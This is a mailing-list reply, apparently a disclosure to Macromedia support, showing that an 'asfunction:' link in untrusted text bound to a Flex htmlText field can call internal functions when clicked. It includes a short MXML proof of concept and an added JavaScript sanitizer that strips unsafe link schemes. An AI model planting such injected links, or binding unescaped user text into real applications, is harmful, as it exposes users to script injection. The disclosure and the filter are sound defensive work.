Semantics aside, flex applications tend to promote a type of
interaction that the majority of flash applications (in general) do not.  

FYI, I misspoke hugely.  The offending command is asfunction, not
fscommand.

Here is a sample exploit.  It requires you to trick the user into
clicking a "link". But if you can do that some percent of the time,
with the aid of a flash decompiler to explore the app, you might be
able to do all sorts of interesting things.

<?xml version="1.0" encoding="utf-8"?>
<mx:Application xmlns:mx="http://www.macromedia.com/2003/mxml" xmlns="*">

    <mx:Script>
    <![CDATA[
        // Internal function that is never meant to be reachable from user data.
        private function hello() {
            alert("hello world");
        }
        // Untrusted text (e.g. received from another user via a RemoteObject).
        // An asfunction: link inside htmlText calls back into the movie, so this
        // attacker-controlled markup invokes hello() when the user clicks it.
        private var textFromAnotherUserViaRemoteObject = "Please <u><a href='asfunction:_parent.hello'>click me</a></u>";
    ]]>
    </mx:Script>

    <!-- Binding untrusted text straight into htmlText renders the link live. -->
    <mx:Text htmlText="{textFromAnotherUserViaRemoteObject}"/>

</mx:Application>


--- In [email protected], John Dowdell <[EMAIL PROTECTED]> wrote:
> The title may be a bit of a misnomer, because Macromedia Flex lives on 
> the server, while cross-site scripting exploits would occur on the 
> client machines. This seems a sub-class of general security in the 
> Macromedia Flash Player rather than the development environment, true...?
> 
> Here's general background info on security and privacy in the Macromedia 
> Flash Player:
> http://www.macromedia.com/devnet/flashplayer/
> ... and here's background on recent security issues in the Macromedia 
> Flash Player:
> http://www.macromedia.com/devnet/security/security_zone/#flashplayer
> 
> As I understand the post, you're concerned about the possibility of a 
> command injection into a textfield of a SWF application. (I could be 
> wrong, but it sounded to me more like a script-injection issue than a 
> cross-site scripting issue.) Have you been able to see this happen yet? 
> have you typed "fscommand:()" into a textfield in a particular component 
> to pop up an alert or such? If there's a recipe that could be reproduced 
> in-house then we can work on it.
> 
> Or is it more a general curiosity, about whether there might be a way 
> that such a thing is possible....?
> 
> tx,
> jd
> 
> 
> 
> 
> -- 
> John Dowdell . Macromedia Developer Support . San Francisco CA USA
> Weblog: http://www.macromedia.com/go/blog_jd
> Aggregator: http://www.macromedia.com/go/weblogs
> Technotes: http://www.macromedia.com/support/
> Spam killed my private email -- public record is best, thanks.
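An added defensive counterpart to the sample exploit above (not code from the original post): before untrusted text is bound to htmlText, either escape it as plain text or strip anchors whose href scheme is not on an allow-list, so an asfunction: link never reaches the text field. It is written in JavaScript so it runs as-is; the same logic ports to ActionScript 2, and the helper names (escapeHtml, hrefIsSafe, stripDangerousLinks) are assumptions, not an existing Flex API.

```javascript
// Added example: filter untrusted text destined for a Flash htmlText property.
// Strategy 1: escapeHtml() treats the text as plain text, so no markup survives.
// Strategy 2: stripDangerousLinks() keeps simple markup but unwraps any <a>
// whose href scheme is not allow-listed (asfunction:, javascript:, ...).

const ALLOWED_SCHEMES = ["http:", "https:", "mailto:"];

function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => ({
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
  })[c]);
}

// True if the href is relative or uses an allow-listed scheme.
function hrefIsSafe(href) {
  // Decode numeric entities and drop whitespace/control characters first,
  // so "as&#102;unction:" or "as\tfunction:" cannot hide the scheme.
  const decoded = href
    .replace(/&#x([0-9a-f]+);/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/[\s\u0000-\u001f]/g, "")
    .toLowerCase();
  const m = /^([a-z][a-z0-9+.-]*:)/.exec(decoded);
  if (!m) return true; // no scheme: relative URL
  return ALLOWED_SCHEMES.includes(m[1]);
}

// Replaces every <a ...>inner</a> with an unsafe href by its inner text only.
function stripDangerousLinks(html) {
  return html.replace(/<a\b([^>]*)>([\s\S]*?)<\/a>/gi, (whole, attrs, inner) => {
    const m = /href\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(attrs);
    const href = m ? (m[1] ?? m[2] ?? m[3]) : "";
    return hrefIsSafe(href) ? whole : inner;
  });
}

// Constructed sample mirroring the payload in the post above.
const SAMPLE = "Please <u><a href='asfunction:_parent.hello'>click me</a></u>";
```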
